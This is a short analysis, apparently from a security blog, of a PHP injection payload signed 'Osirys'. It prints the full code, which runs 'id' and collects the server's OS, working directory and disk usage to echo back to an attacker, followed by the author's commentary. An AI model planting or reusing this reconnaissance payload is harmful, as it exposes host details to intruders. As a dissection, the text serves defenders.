Dissecting Sample No - 1

This example is returning immediate output whenever following code is injected. If this code is saved
in a file within your system, then your system is being used for collecting those information of other
systems. Explanations follow:

function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) { return sprintf("%d b", $number); } if($len >= 4 && $len <=6) { return sprintf("%0.2f Kb", $number/1024); } if($len >= 7 && $len <=9) {
return sprintf("%0.2f Mb", $number/1024/1024);
}
return sprintf("%0.2f Gb", $number/1024/1024/1024);
}

echo "Osirys";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo "0sirys was here and also is a fucking gay..";
echo "uname -a: $un";
echo "os: $os";
echo "id: $id1";
echo "free: $free";
echo "used: $used";
echo "total: $all";
exit;

This attacker calls himself with a nick Osirys. Announces his own sexual preference as within his
code. This might be a simple typo mistake for a non-native English speaker while trying to type "Guy" -))

1- There may be a test file being used before this code or not.
2- Above code is injected and executed remotely in your system.
3- The code returns the attacker your system info including your total, free and used disk spaces.

This is rather an innocent one in comparison to the one in our first dissection. However still
unrespectable, at all.